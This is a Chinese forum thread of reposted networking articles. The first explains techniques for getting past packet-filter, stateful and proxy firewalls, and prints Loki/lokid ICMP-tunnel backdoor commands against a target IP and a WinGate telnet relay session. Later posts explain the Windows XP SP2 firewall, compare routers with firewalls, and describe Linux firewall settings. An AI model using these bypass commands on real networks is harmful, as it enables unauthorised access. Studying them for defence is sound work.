说到访问控制,这是防火墙的核心了:),防火墙主要通过一个访问控制表来判断的,他的形式一般是一连串的如下规则:

1 accept from+ 源地址,端口 to+ 目的地址,端口+ 采取的动作

2 deny ...........(deny就是拒绝。。)

3 nat ............(nat是地址转换。后面说)

防火墙在网络层(包括以下的炼路层)接受到网络数据包后,就从上面的规则连表一条一条地匹配,如果符合就执行预先安排的动作了!如丢弃包。。。。

但是,不同的防火墙,在判断攻击行为时,有实现上的差别。下面结合实现原理说说可能的攻击。


二 攻击包过滤防火墙

包过滤防火墙是最简单的一种了,它在网络层截获网络数据包,根据防火墙的规则表,来检测攻击行为。他根据数据包的源IP地址;目的IP地址;TCP/UDP源端口;TCP/UDP目的端口来过滤!!很容易受到如下攻击:

1 ip 欺骗攻击:

这种攻击,主要是修改数据包的源,目的地址和端口,模仿一些合法的数据包来骗过防火墙的检测。如:外部攻击者,将他的数据报源地址改为内部网络地址,防火墙看到是合法地址就放行了:)。可是,如果防火墙能结合接口,地址来匹配,这种攻击就不能成功了:(

2 d.o.s拒绝服务攻击

简单的包过滤防火墙不能跟踪 tcp的状态,很容易受到拒绝服务攻击,一旦防火墙受到d.o.s攻击,他可能会忙于处理,而忘记了他自己的过滤功能。:)你就可以饶过了,不过这样攻击还很少的。!

3 分片攻击

这种攻击的原理是:在IP的分片包中,所有的分片包用一个分片偏移字段标志分片包的顺序,但是,只有第一个分片包含有TCP端口号的信息。当IP分片包通过分组过滤防火墙时,防火墙只根据第一个分片包的Tcp信息判断是否允许通过,而其他后续的分片不作防火墙检测,直接让它们通过。

这样,攻击者就可以通过先发送第一个合法的IP分片,骗过防火墙的检测,接着封装了恶意数据的后续分片包就可以直接穿透防火墙,直接到达内部网络主机,从而威胁网络和主机的安全。

4 木马攻击

对于包过滤防火墙最有效的攻击就是木马了,一但你在内部网络安装了木马,防火墙基本上是无能为力的。

原因是:包过滤防火墙一般只过滤低端口(1-1024),而高端口他不可能过滤的(因为,一些服务要用到高端口,因此防火墙不能关闭高端口的),所以很多的木马都在高端口打开等待,如冰河,subseven等。。。

但是木马攻击的前提是必须先上传,运行木马,对于简单的包过滤防火墙来说,是容易做的。这里不写这个了。大概就是利用内部网络主机开放的服务漏洞。

早期的防火墙都是这种简单的包过滤型的,到现在已很少了,不过也有。现在的包过滤采用的是状态检测技术,下面谈谈状态检测的包过滤防火墙。

三 攻击状态检测的包过滤

状态检测技术最早是checkpoint提出的,在国内的许多防火墙都声称实现了状态检测技术。

可是:)很多是没有实现的。到底什么是状态检测?

一句话,状态检测就是从tcp连接的建立到终止都跟踪检测的技术。

原先的包过滤,是拿一个一个单独的数据包来匹配规则的。可是我们知道,同一个tcp连接,他的数据包是前后关联的,先是syn包,-》数据包=》fin包。数据包的前后序列号是相关的。

如果割裂这些关系,单独的过滤数据包,很容易被精心够造的攻击数据包欺骗!!!如nmap的攻击扫描,就有利用syn包,fin包,reset包来探测防火墙后面的网络。!

相反,一个完全的状态检测防火墙,他在发起连接就判断,如果符合规则,就在内存登记了这个连接的状态信息(地址,port,选项。。),后续的属于同一个连接的数据包,就不需要在检测了。直接通过。而一些精心够造的攻击数据包由于没有在内存登记相应的状态信息,都被丢弃了。这样这些攻击数据包,就不能饶过防火墙了。

说状态检测必须提到动态规则技术。在状态检测里,采用动态规则技术,原先高端口的问题就可以解决了。实现原理是:平时,防火墙可以过滤内部网络的所有端口(1-65535),外部攻击者难于发现入侵的切入点,可是为了不影响正常的服务,防火墙一但检测到服务必须开放高端口时,如(ftp协议,irc等),防火墙在内存就可以动态地天加一条规则打开相关的高端口。等服务完成后,这条规则就又被防火墙删除。这样,既保障了安全,又不影响正常服务,速度也快。!

一般来说,完全实现了状态检测技术防火墙,智能性都比较高,一些扫描攻击还能自动的反应,因此,攻击者要很小心才不会被发现。

但是,也有不少的攻击手段对付这种防火墙的。

1 协议隧道攻击

协议隧道的攻击思想类似与VPN的实现原理,攻击者将一些恶意的攻击数据包隐藏在一些协议分组的头部,从而穿透防火墙系统对内部网络进行攻击。

例如,许多简单地允许ICMP回射请求、ICMP回射应答和UDP分组通过的防火墙就容易受到ICMP和UDP协议隧道的攻击。Loki和lokid(攻击的客户端和服务端)是实施这种攻击的有效的工具。在实际攻击中,攻击者首先必须设法在内部网络的一个系统上安装上lokid服务端,而后攻击者就可以通过loki客户端将希望远程执行的攻击命令(对应IP分组)嵌入在ICMP或UDP包头部,再发送给内部网络服务端lokid,由它执行其中的命令,并以同样的方式返回结果。由

于许多防火墙允许ICMP和UDP分组自由出入,因此攻击者的恶意数据就能附带在正常的分组,绕过防火墙的认证,顺利地到达攻击目标主机下面的命令是用于启动lokid服务器程序:

lokid-p–I–vl

loki客户程序则如下启动:

loki–d172.29.11.191(攻击目标主机)-p–I–v1–t3

这样,lokid和loki就联合提供了一个穿透防火墙系统访问目标系统的一个后门。

2 利用FTP-pasv绕过防火墙认证的攻击

FTP-pasv攻击是针对防火墙实施入侵的重要手段之一。目前很多防火墙不能过滤这种攻击手段。如CheckPoint的Firewall-1,在监视FTP服务器发送给客户端的包的过程中,它在每个包中寻找"227"这个字符串。如果发现这种包,将从中提取目标地址和端口,并对目标地址加以验证,通过后,将允许建立到该地址的TCP连接。

攻击者通过这个特性,可以设法连接受防火墙保护的服务器和服务。详细的描述可见:http://www.checkpoint.com/techsupport/alerts/pasvftp.html

3 反弹木马攻击

反弹木马是对付这种防火墙的最有效的方法。攻击者在内部网络的反弹木马定时地连接外部攻击者控制的主机,由于连接是从内部发起的,防火墙(任何的防火墙)都认为是一个合法的连接,因此基本上防火墙的盲区就是这里了。防火墙不能区分木马的连接和合法的连接。

但是这种攻击的局限是:必须首先安装这个木马!!!所有的木马的第一步都是关键!!!

四 攻击代理

代理是运行在应用层的防火墙,他实质是启动两个连接,一个是客户到代理,另一个是代理到目的服务器。

实现上比较简单,和前面的一样也是根据规则过滤。由于运行在应用层速度比较慢/1

攻击代理的方法很多。

这里就以wingate为例,简单说说了。(太累了)

WinGate是目前应用非常广泛的一种Windows95/NT代理防火墙软件,内部用户可以通过一台安装有WinGate的主机访问外部网络,但是它也存在着几个安全脆弱点。

黑客经常利用这些安全漏洞获得WinGate的非授权Web、Socks和Telnet的访问,从而伪装成WinGate主机的身份对下一个攻击目标发动攻击。因此,这种攻击非常难于被跟踪和记录。

导致WinGate安全漏洞的原因大多数是管理员没有根据网络的实际情况对WinGate代理防火墙软件进行合理的设置,只是简单地从缺省设置安装完毕后就让软件运行,这就给攻击者可乘之机。

1 非授权Web访问

某些WinGate版本(如运行在NT系统下的2.1d版本)在误配置情况下,允许外部主机完全匿名地访问因特网。因此,外部攻击者就可以利用WinGate主机来对Web服务器发动各种Web攻击( 如CGI的漏洞攻击等),同时由于Web攻击的所有报文都是从80号Tcp端口穿过的,因此,很难追踪到攻击者的来源。

检测

检测WinGate主机是否有这种安全漏洞的方法如下:

1) 以一个不会被过滤掉的连接(譬如说拨号连接)连接到因特网上。

2) 把浏览器的代理服务器地址指向待测试的WinGate主机。

如果浏览器能访问到因特网,则WinGate主机存在着非授权Web访问漏洞。


2 非授权Socks访问

在WinGate的缺省配置中,Socks代理(1080号Tcp端口)同样是存在安全漏洞。与打开的Web代理(80号Tcp端口)一样,外部攻击者可以利用Socks代理访问因特网。


防范

要防止攻击WinGate的这个安全脆弱点,管理员可以限制特定服务的捆绑。在多宿主(multi homed)系统上,执行以下步骤以限定如何提供代理服务。

1选择Socks或WWWProxyServer属性。

2选择Bindings标签。

3按下ConnectionsWillBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。

非授权Telnet访问

它是WinGate最具威胁的安全漏洞。通过连接到一个误配置的WinGate服务器的Telnet服务,攻击者可以使用别人的主机隐藏自己的踪迹,随意地发动攻击。

检测

检测WinGate主机是否有这种安全漏洞的方法如下:

1使用telnet尝试连接到一台WinGate服务器。

[root@happy/tmp]#telnet172.29.11.191

Trying172.29.11.191….

Connectedto172.29.11.191.

Escapecharacteris‘^]’.

Wingate>10.50.21.5


2如果接受到如上的响应文本,那就输入待连接到的网站。


3如果看到了该新系统的登录提示符,那么该服务器是脆弱的。

Connectedtohost10.50.21.5…Connected

SunOS5.6

Login:

对策

防止这种安全脆弱点的方法和防止非授权Socks访问的方法类似。在WinGate中简单地限制特定服务的捆绑就可以解决这个问题。一般来说,在多宿主(multihomed)系统管理员可以通过执行以下步骤来完成:

1选择TelnetSever属性。

2选择Bindings标签。

3按下ConnectionsWillBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。


五 后话

有防火墙的攻击不单是上面的一点,我有什么写的不对的,大家指正。

一直以来,黑客都在研究攻击防火墙的技术和手段,攻击的手法和技术越来越智能化和多样化。但是就黑客攻击防火墙的过程上看,大概可以分为三类攻击。

第一类攻击防火墙的方法是探测在目标网络上安装的是何种防火墙系统并且找出此防火墙系统允许哪些服务。我们叫它为对防火墙的探测攻击。

第二类攻击防火墙的方法是采取地址欺骗、TCP序号攻击等手法绕过防火墙的认证机制,从而 对防火墙和内部网络破坏。

第三类攻击防火墙的方法是寻找、利用防火墙系统实现和设计上的安全漏洞,从而有针对性地发动攻击。这种攻击难度比较大,可是破坏性很大。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 9 发表于: 2008-03-25 10:46:52
解读Windows XP SP2防火墙

Windows XP SP2在安全方面做了重大的调整,安全设计融合到整个操作系统中,防火墙屏障、操作系统补丁和更新病毒库等理念形成一个安全体系,而防火墙是这个安全体系的第一道屏障,它提供了一个强大的保护层,可以阻止恶意用户和程序依*未经请求的传入流量攻击计算机。Windows XP SP2防火墙又称ICF(Internet Connection frewall),已经具备个人防火墙的基本功能,它是一种能够阻截所有传入的未经请求的流量的状态防火墙。这些流量既不是响应计算机请求而发送的流量(请求流量),也不是事先指定允许传入的未经请求的流量(异常流量)。这有助于使计算机更加安全,使您可以更好地控制计算机上的数据。和Windows良好的兼容性及可*性是其它个人防火墙所不能比拟的。
  注:此文只探讨Windows 防火墙原理、功能变化以及应用过程中可能遇到问题和解决办法,不描述怎样设置Windows 防火墙,如果未特别说明,本文所提到的Windows 防火墙指Windows XP SP2防火墙。

一、使用个人防火墙还是使用Windows 防火墙

  仅就防火墙功能而言,个人防火墙对双向流量都进行审核,拥有更复杂的控制列表,但是,Windows 防火墙只阻截所有传入的未经请求的流量,对主动请求传出的流量不作理会,这一点是它们之间最大的区别。绝大多数商业防火墙都提供了应用程序过滤功能,这一功能可以阻止未通过认证的应用程序向外发送报文,这样就可以防止病毒或木马等恶意代码同外部建立未认证的连接,同时也可以防止用户的计算机被黑客用做分布式攻击的跳板。然而,WindowsXP SP2所带的防火墙却只能对进入计算机的报文进行过滤,而不对计算机向外发出的报文进行过滤,它不对应用程序向外发送报文做任何限制。 事物有其两面性,这些个人防火墙产品依据的防黑客原理通常不一样,例如Norton的Personal Firewall(个人防火墙)是基于应用程序的(Application Level)。基于应用程序的防火墙在使用上相当麻烦,因为你必须要为每一个访问Internet的程序设置策略。而随着策略的增多,防火墙的效率也逐步下降,况且过多的策略也会相互矛盾、影响,给系统安全带来漏洞。更糟糕的是,这些个人防火墙产品都非常占用系统资源。

  比如接入网络游戏联众世界的时候,本地计算机请求连接远程服务器,这时,个人防火墙立即提示是否允许此连接通过,而Windows 防火墙对这个主动出站请求不做任何处理,也不做任何提示,好像防火墙不存在似的,所以如果入侵已经发生或间谍软件已经安装,并主动连接到外部网络,那么防火墙束手无策;如果Windows 间谍软件开放端口等待外部请求连接,那么Windows 防火墙立刻阻断连接并弹出安全警告。但这不表示Windows防火墙不安全,因为攻击多来自外部,而且如果间谍软件开放端口等待外部连接的时候,Windows防火墙立即阻断连接,并且作出提示,关于这一点在下面的文章中还会提到。

  对来自外部的请求连接的控制,Windows防火墙和个人防火墙在功能上区别不大。而且Windows防火墙有其独特的特性,包括:计算机的所有连接默认启用ICF、人性化的屏蔽模式-充分考虑到了计算机使用环境的变化和及时阻断攻击和恢复正常使用的情况、智能应用程序异常流量管理、对于 IPv6 ICF 内建支持等功能。比如在启动安全性功能上,有一个可以执行状态数据包过滤的启动策略。该策略允许计算机使用动态主机配置协议(Dynamic Host Configuration Protocol,DHCP)和域名系统(Domain Name System,DNS)执行基本网络启动任务,并与域控制器进行通信,以更新组策略。避免计算机在网络上进入活动状态的时间与 ICF 开始保护连接的时间之间的延迟中被未经请求的流量在启动期间攻击计算机留下了可乘之机。

  遗憾的是Windows防火墙并不提供报警和入侵检测。虽然Windows防火墙可以防止对系统的入侵。而且,其他的一些个人防火墙产品还有更好的诊断和报告功能(Windows防火墙没有报告功能,仅仅有个日志)。所以,当选择使用哪个防火墙产品时,你应该考虑这些因素。如果你选择Windows防火墙,你应该确定自己明白它的有限的能力,虽然Windows 防火墙对个人用户而言已经不在是鸡肋。

二、Windows XP SP2防火墙工作原理

  Windows 防火墙使用的全状态数据包监测技术会把所有由本机发起的网络连接生成一张表,并用这张表跟所有的入站数据包作对比,如果入站的数据包是为了响应本机的请求,那么就被允许进入。除非有实施专门的过滤器以允许特定的非主动请求数据包,否则所有其他数据包都会被阻挡。

“例外”选项卡使您可以添加程序和端口例外,以允许特定类型的传入通信。您可以为每个例外设置范围。如果开放了某个端口,那么对这个端口的访问将被允许通过。端口或者服务可以在“例外”选项中设置或者通过指定应用程序的方法设置,如QQ等,如果开放端口的服务不是一个应用程序如IIS服务,可以直接设置开放的协议和端口号。对于只使用网络浏览、电子邮件、共享文件夹、进行普通处理的客户端和服务器型应用程序的用户,Windows防火墙根本不会产生影响。

  三、Windows 防火墙设置中几个重要选项

  单击“开始”,单击“运行”,键入 wscui.cpl,然后单击“确定”,在“Windows 全中心”内单击“Windows 防火墙”。

对于“不允许例外”

当您单击选中“不允许例外”时,Windows 防火墙将阻止所有连接到您的计算机的请求,即使请求来自“例外”选项卡上列出的程序或服务也是如此。防火墙还会阻止发现网络设备、文件共享和打印机共享。当您连接到公用网络(例如,与机场或旅馆相关的网络)时,“不允许例外”选项十分有用。此设置可以阻止所有连接到您的计算机的尝试,因而有助于保护您的计算机。当您使用 Windows 防火墙并启用了“不允许例外”选项时,您仍然可以查看网页,收发电子邮件或使用即时消息传递程序。

针对“例外”的说明

“例外”选项卡使您可以添加程序和端口例外,以允许特定类型的传入通信。您可以为每个例外设置范围。
对于家庭和小型办公室网络,我们建议您在可能的条件下,将范围设定为仅限局域网内部。这样配置可以使同一个子网上的计算机可以与此计算机上的程序连接,但拒绝源自远程网络的通信。

四、Windows XP SP2的防火墙真的安全吗?

  Windows防火墙在原则上是对由外向内的通信(inbound)全部进行限制,而由内向外的通信(outbound)及其应答则完全不加限制。Windows防火墙只在像服务器那样运行的应用程序开始通信时才会发出警告。以登录联众世界为例:在所有网络链接上打开防火墙,现在,登陆联众世界试试,一样登陆,根本不需要通过防火墙允许。选择了“不允许例外”,结果还是一样。而用zonealarm的时候,任何程序都得经过防火墙的允许。这是为什么?

  前面已经提到了Windows防火墙的特点“只阻截所有传入的未经请求的流量”也就是说,Windows防火墙对主动出站流量不作处理,所以登陆联众世界/IE等没有安全提示,而zonealarm等个人防火墙对所有出、入站流量都作审查,所以有安全提示(除非设置审查但不提示)。但是,为什么QQ/MSN/MYIE2等又有安全提示呢?这是因为QQ/MSN/MYIE2等试图在本地开后门--端口等待远程请求连接,显然这种不安全行为被Windows防火墙拦截并作出安全提示,这相当于QQ/MSN/MYIE2等作为提供某种服务的服务器端。如图所示,MYIE2在本开了1067端口,QQ使6000和6001处在监听状态,而联众世界却没有开放任何端口。

取消通知的方法是:防火墙设置-例外-取消选择“Windows防火墙组织程序时通知我”。



五、Windows XP SP2的防火墙可以限制某个应用程序访问网络吗?

  Windows XP SP2的防火墙置不适用于不对特定 UDP 或 TCP 端口集合进行监听的应用程序,不能限制某个应用程序访问网络,但是,却可以限制对谁提供哪些服务,这一点也不同于早期版本的Windows防火墙。

  虽然Windows防火墙不可以限制出站通讯,但是Windows XP内置的Internet Protocol security (IPSec)却可以提供这种保护,使用IPSec规则,可以指定通讯是被阻断(丢弃数据)还是被放行(允许),同时能保护加密的入站和出站通讯。在这三种情况下(阻断、允许、保护),IPSec能够配置原地址和目标地址范围。同时使用IPSec规则和Windows防火墙可以给网络提供更强大的安全保护。

  对早期Windows防火墙而言,如果开启了某些服务,它将允许所有人访问这些服务,但是SP2的防火墙却可以精确的设置是对某台计算机或者某些子网允许连接;如果没有开启服务,则所有连接都将被拒绝。设置方法:安全中心-防火墙设置-例外-编辑(某个服务)-更改范围-自定义列表。自定义列表的说明,如果对某个IP提供服务,设置子网掩码为全1,例如192.168.0.3/255.255.255.255;如果针对某个子网提供服务,设置正确的子网掩码,如192.168.0.1/255.255.255.128,多个项目之间用“,”号隔离。

如上所述,ICF和基于应用程序的个人防火墙产品是不一样的。基于应用程序的个人防火墙可以控制每一个访问Internet的程序,但是不能限制某个应用程序访问网络,使用使用IPSec规则可以提供对计算机向外发出的报文进行过滤的功能。

六、部署文件和打印共享、网上邻居不再困难

  网络资源共享的一个重要应用是文件和打印共享,如果启用了防火墙是不是象2003或XPSP1中的防火墙一样,阻止了文件和打印共享服务呢?在Windows XP SP22的防火墙下部署文件和打印共享服务非常简单,不必担心出现早期版本遇到的难堪的困难,如上图在“例外”选项上“程序和服务”列表中选择“文件及打印机共享”就可以了。曾几何时,在XPSP1防火墙中如果要让防火墙和网上邻居共存需要映射多个端口,现在,如果在Windows XP SP2防火墙启用了“文件及打印机共享”,网上邻居不能正确显示的问题也迎刃而解。

这样可能带来新问题!如果企业网络同时连接外部网络,比如INTERNET,对外开放这些端口是不安全的。Windows XP SP2防火墙考虑到了这个安全问题,在“编辑服务”选项中点击“更改范围”,在弹出的对话框中选择“仅我的网络(子网)”,这样设置后,文件和打印共享服务只对内部提供提供,而对外而言服务是不可见的,这样就安全多了

七、没有人能PING到我的计算机

  在检查网络故障的使用通常用PING命令工具,PING一个IP确认该计算机是否存在,当你PING的时候,发送的是ICMP(Internet 控制消息协议 ,此通信用于错误和状态信息的传递) Echo messag信号,获得的回应是ICMP Echo Reply message信号。在默认情况下,indows xp p2防火墙不允许ICMP Echo messages 入站数据进入,所以也就不会回复ICMP Echo Reply message数据报文了。

如果启用了TCP端口445(比如在“例外”中启用了“文件和打印机共享”),那么别人是可以PING到你的IP的。另外,在防火墙的高级选项卡中选择ICMP设置,并且选择了“允许传入回现请求”也可以使别人能够PING到你的IP。

八、关于远程协作和远程桌面

通过Windows XP SP2防火墙实现远程协作的方法很简单,虽然远程协作使用的是动态端口。在防火墙设置对话框中的“例外”选项卡上“程序和服务”列表中选择“远程协作”项目,这样Windows自动监视并正确处理来自sessmgr.exe应用程序的所有通讯请求完成连接。

  Windows NetMeeting 的远程桌面要复杂一些,尽管在例外选项卡中有“远程桌面”选项,但是如果你选择这个选项,实际是开放了TCP的端口3389,也可能无法完成远程桌面连接,正确的方法是:在 Windows 防火墙打开的情况下,在可以使用 Windows NetMeeting 的远程桌面共享功能之前,必须向 Windows 防火墙的“例外”选项卡上“程序和服务”列表中分别为 Windows NetMeeting 和 Mnmsrvc.exe( Drive:\Windows\System32 目录中)文件和conf.exe(Drive:\Program Files\NetMeeting 文件夹中)文件分别添加一个条目。

九、Windows XP SP2的防火墙日志的妙用

日志记录可以帮助确定入站通信的来源,并提供有关被阻止的通信的详细信息。%Windir%\pfirewall.log 是默认的日志文件,这里记录的是成功的连接,看看都暴露了哪些信息,其中中文是作者说明文字。

pfirewall.log

#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
表头:日期 时间 状态 协议 原IP 目标IP 原端口 目标端口 数据包大小 TCP 控制标志 确认 其他数据 推入功能 重置连接 同步序列号 紧急指针字段有效 序列号 确认号 窗口大小 ICMP类型 ICMP代码 信息条目
2004-09-08 00:55:39 OPEN UDP 219.154.214.145 202.102.224.68 1026 53 - - - - - - - - -
查询DNS服务器,DNS服务器地址是202.102.224.68
2004-09-08 00:55:40 OPEN UDP 219.154.214.145 219.133.40.157 6001 8001 - - - - - - - - -
QQ开放UDP端口6001,目标地址219.133.40.157
2004-09-08 00:55:40 OPEN UDP 219.154.214.145 202.104.129.254 4000 8000 - - - - - - - - -
QQ开放UDP端口4000,目标地址202.104.129.254
2004-09-08 00:55:40 OPEN UDP 219.154.214.145 219.133.38.21 6001 8001 - - - - - - - - -
QQ开放UDP端口6001,目标地址219.133.38.21
2004-09-08 00:55:53 OPEN UDP 219.154.214.145 61.172.249.139 4000 8000 - - - - - - - - -
QQ开放UDP端口6001,目标地址61.172.249.139
2004-09-08 00:57:08 CLOSE UDP 219.154.214.145 202.102.224.68 1026 53 - - - - - - - - -
查询DNS服务器,DNS服务器地址是202.102.224.68
2004-09-08 00:57:08 CLOSE UDP 219.154.214.145 219.133.40.157 6001 8001 - - - - - - - - -
QQ通过UDP端口6001和目标地址219.133.40.157建立的通讯
2004-09-08 00:57:08 CLOSE UDP 219.154.214.145 219.133.38.21 6001 8001 - - - - - - - - -
QQ通过UDP端口6001和目标地址219.133.38.21建立的通讯

从中可以看出,通过分析日志可以搜集某项应用软件服务端(如QQ服务器)的IP地址,检查是否有木马悄悄开放了后门,确定某个软件建立连接时所需要的端口号,还可以查询攻击者的来源地址。下面附录详细解释了日志表头信息。

注意:连字符 (-) 用于其中没有条目信息的字段。

  十、谁关闭了防火墙

  大多数第三方防火墙软件提供商如Zone Labs、McAfee和Symantec公司都将在近期提供和SP2兼容的新版本防火墙软件。这些新版软件在安装的时候会自动禁用Windows防火墙,而在卸载时又会自动启用Windows防火墙。第三方厂商通过调用Windows Firewall API来实现这一功能。然而,既然防火墙软件可以这么做,其他病毒或木马等恶意代码就同样也可以。病毒或木马可以修改Windows防火墙程序,甚至干脆关闭它。而Zone Labs公司声明,他们采取了一些锁定技术来保证他们的防火墙软件不会被其他第三方软件关闭,除非你将整个防火墙卸载掉。

  以下命令显示防火墙状态和配置信息

  Netsh firewall show state
  Netsh firewall show config

  另外,如果防火墙被关闭,安全中心会显示安全警告!

  总结

  总的来看,相对于以前的Windows自带的防火墙SP2的防火墙拥有更高的防范性能,几乎拥有了其它个人防火墙的优点,所以Win XP SP2的防火墙是值得一试的,特别是针对个人用户而言。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 10 发表于: 2008-03-25 10:47:28
谁更安全--黑客眼中的防火墙与路由器

防火墙已经成为企业网络建设中的一个关键组成部分。但有很多用户,认为网络中已经有了路由器,可以实现一些简单的包过滤功能,所以,为什么还要用防火墙呢?以下我们针对防火墙与业界应用最多、最具代表性的路由器在安全方面的对比,来阐述为什么用户网络中有了路由器还需要防火墙。

  一、两种设备产生和存在的背景不同

  1、两种设备产生的根源不同

  路由器的产生是基于对网络数据包路由而产生的。路由器需要完成的是将不同网络的数据包进行有效的路由,至于为什么路由、是否应该路由、路由过后是否有问题等根本不关心,所关心的是:能否将不同的网段的数据包进行路由从而进行通讯。

  防火墙是产生于人们对于安全性的需求。数据包是否可以正确的到达、到达的时间、方向等不是防火墙关心的重点,重点是这个(一系列)数据包是否应该通过、通过后是否会对网络造成危害。

  2、根本目的不同

  路由器的根本目的是:保持网络和数据的“通”。

  防火墙根本的的目的是:保证任何非允许的数据包“不通”。

  二、核心技术的不同

  Cisco路由器核心的ACL列表是基于简单的包过滤,从防火墙技术实现的角度来说,防火墙是基于状态包过滤的应用级信息流过滤。

  一个最为简单的应用:企业内网的一台主机,通过路由器对内网提供服务(假设提供服务的端口为tcp 1455)。为了保证安全性,在路由器上需要配置成:外-〉内 只允许client访问 server的tcp 1455端口,其他拒绝。

  针对现在的配置,存在的安全脆弱性如下:

  1、IP地址欺骗(使连接非正常复位)

  2、TCP欺骗(会话重放和劫持)

  存在上述隐患的原因是,路由器不能监测TCP的状态。如果在内网的client和路由器之间放上防火墙,由于防火墙能够检测TCP的状态,并且可以重新随机生成TCP的序列号,则可以彻底消除这样的脆弱性。同时,防火墙的一次性口令认证客户端功能,能够实现在对应用完全透明的情况下,实现对用户的访问控制,其认证支持标准的Radius协议和本地认证数据库,可以完全与第三方的认证服务器进行互操作,并能够实现角色的划分。

  虽然,路由器的“Lock-and-Key”功能能够通过动态访问控制列表的方式,实现对用户的认证,但该特性需要路由器提供Telnet服务,用户在使用使也需要先Telnet到路由器上,使用起来不很方便,同时也不够安全(开放的端口为黑客创造了机会)。

  三、安全策略制定的复杂程度不同

  路由器的默认配置对安全性的考虑不够,需要一些高级配置才能达到一些防范攻击的作用,安全策略的制定绝大多数都是基于命令行的,其针对安全性的规则的制定相对比较复杂,配置出错的概率较高。

  防火墙的默认配置既可以防止各种攻击,达到既用既安全,安全策略的制定是基于全中文的GUI的管理工具,其安全策略的制定人性化,配置简单、出错率低。

  四、对性能的影响不同

  路由器是被设计用来转发数据包的,而不是专门设计作为全特性防火墙的,所以用于进行包过滤时,需要进行的运算非常大,对路由器的CPU和内存的需要都非常大,而路由器由于其硬件成本比较高,其高性能配置时硬件的成本都比较大。

  防火墙的硬件配置非常高(采用通用的INTEL芯片,性能高且成本低),其软件也为数据包的过滤进行了专门的优化,其主要模块运行在操作系统的内核模式下,设计之时特别考虑了安全问题,其进行数据包过滤的性能非常高。

  由于路由器是简单的包过滤,包过滤的规则条数的增加,NAT规则的条数的增加,对路由器性能的影响都相应的增加,而防火墙采用的是状态包过滤,规则条数,NAT的规则数对性能的影响接近于零。

  五、审计功能的强弱差异巨大

  路由器本身没有日志、事件的存储介质,只能通过采用外部的日志服务器(如syslog,trap)等来完成对日志、事件的存储;路由器本身没有审计分析工具,对日志、事件的描述采用的是不太容易理解的语言;路由器对攻击等安全事件的相应不完整,对于很多的攻击、扫描等操作不能够产生准确及时的事件。审计功能的弱化,使管理员不能够对安全事件进行及时、准确的响应。


  六、防范攻击的能力不同

  对于像Cisco这样的路由器,其普通版本不具有应用层的防范功能,不具有入侵实时检测等功能,如果需要具有这样的功能,就需要生级升级IOS为防火墙特性集,此时不单要承担软件的升级费用,同时由于这些功能都需要进行大量的运算,还需要进行硬件配置的升级,进一步增加了成本,而且很多厂家的路由器不具有这样的高级安全功能。可以得出:

  ·具有防火墙特性的路由器成本 > 防火墙 + 路由器

  ·具有防火墙特性的路由器功能 < 防火墙 + 路由器

  ·具有防火墙特性的路由器可扩展性 < 防火墙 + 路由器

  综上所述,可以得出结论:用户的网络拓扑结构的简单与复杂、用户应用程序的难易程度不是决定是否应该使用防火墙的标准,决定用户是否使用防火墙的一个根本条件是用户对网络安全的需求!

  即使用户的网络拓扑结构和应用都非常简单,使用防火墙仍然是必需的和必要的;如果用户的环境、应用比较复杂,那么防火墙将能够带来更多的好处,防火墙将是网络建设中不可或缺的一部分,对于通常的网络来说,路由器将是保护内部网的第一道关口,而防火墙将是第二道关口,也是最为严格的一道关口。
离线深水易寒

发帖
2098
今日发帖
最后登录
2020-02-27
只看该作者 11 发表于: 2008-03-25 10:48:08
Linux 防火墙配置基础篇

RedHat Linux 为增加系统安全性提供了防火墙保护。防火墙存在于你的计算机和网络之间,用来判定网络中的远程用户有权访问你的计算机上的哪些资源。一个正确配置的防火墙可以极大地增加你的系统安全性。
为你的系统选择恰当的安全级别。

「高级」

如果你选择了「高级」 ,你的系统就不会接受那些没有被你具体指定的连接(除了默认设置外)。只有以下连接是默认允许的:

DNS回应

DHCP — 任何使用 DHCP 的网络接口都可以被相应地配置。

如果你选择「高级」,你的防火墙将不允许下列连接:

1.活跃状态FTP(在多数客户机中默认使用的被动状态FTP应该能够正常运行。)

2.IRC DCC 文件传输

3.RealAudio

4.远程 X 窗口系统客户机

如果你要把系统连接到互联网上,但是并不打算运行服务器,这是最安全的选择。如果需要额外的服务,你可以选择 「定制」 来具体指定允许通过防火墙的服务。

注记:如果你在安装中选择设置了中级或高级防火墙,网络验证方法(NIS 和 LDAP)将行不通。

「中级」

如果你选择了「中级」,你的防火墙将不准你的系统访问某些资源。访问下列资源是默认不允许的:

1.低于1023 的端口 — 这些是标准要保留的端口,主要被一些系统服务所使用,例如: FTP 、 SSH 、 telnet 、 HTTP 、和 NIS 。

2.NFS 服务器端口(2049)— 在远程服务器和本地客户机上,NFS 都已被禁用。

3.为远程 X 客户机设立的本地 X 窗口系统显示。

4.X 字体服务器端口( xfs 不在网络中监听;它在字体服务器中被默认禁用)。

如果你想准许到RealAudio之类资源的访问,但仍要堵塞到普通系统服务的访问,选择 「中级」 。你可以选择 「定制」 来允许具体指定的服务穿过防火墙。

注记:如果你在安装中选择设置了中级或高级防火墙,网络验证方法(NIS 和 LDAP)将行不通。

「无防火墙」

无防火墙给予完全访问权并不做任何安全检查。安全检查是对某些服务的禁用。建议你只有在一个可信任的网络(非互联网)中运行时,或者你想稍后再进行详细的防火墙配置时才选此项。

选择 「定制」 来添加信任的设备或允许其它的进入接口。

「信任的设备」

选择「信任的设备」中的任何一个将会允许你的系统接受来自这一设备的全部交通;它不受防火墙规则的限制。例如,如果你在运行一个局域网,但是通过PPP拨号连接到了互联网上,你可以选择「eth0」,而后所有来自你的局域网的交通将会被允许。把「eth0」选为“信任的”意味着所有这个以太网内的交通都是被允许的,但是ppp0接口仍旧有防火墙限制。如果你想限制某一接口上的交通,不要选择它。

建议你不要将连接到互联网之类的公共网络上的设备定为 「信任的设备」 。

「允许进入」

启用这些选项将允许具体指定的服务穿过防火墙。注意:在工作站类型安装中,大多数这类服务在系统内没有被安装。

「DHCP」

如果你允许进入的 DHCP 查询和回应,你将会允许任何使用 DHCP 来判定其IP地址的网络接口。DHCP通常是启用的。如果DHCP没有被启用,你的计算机就不能够获取 IP 地址。

「SSH」

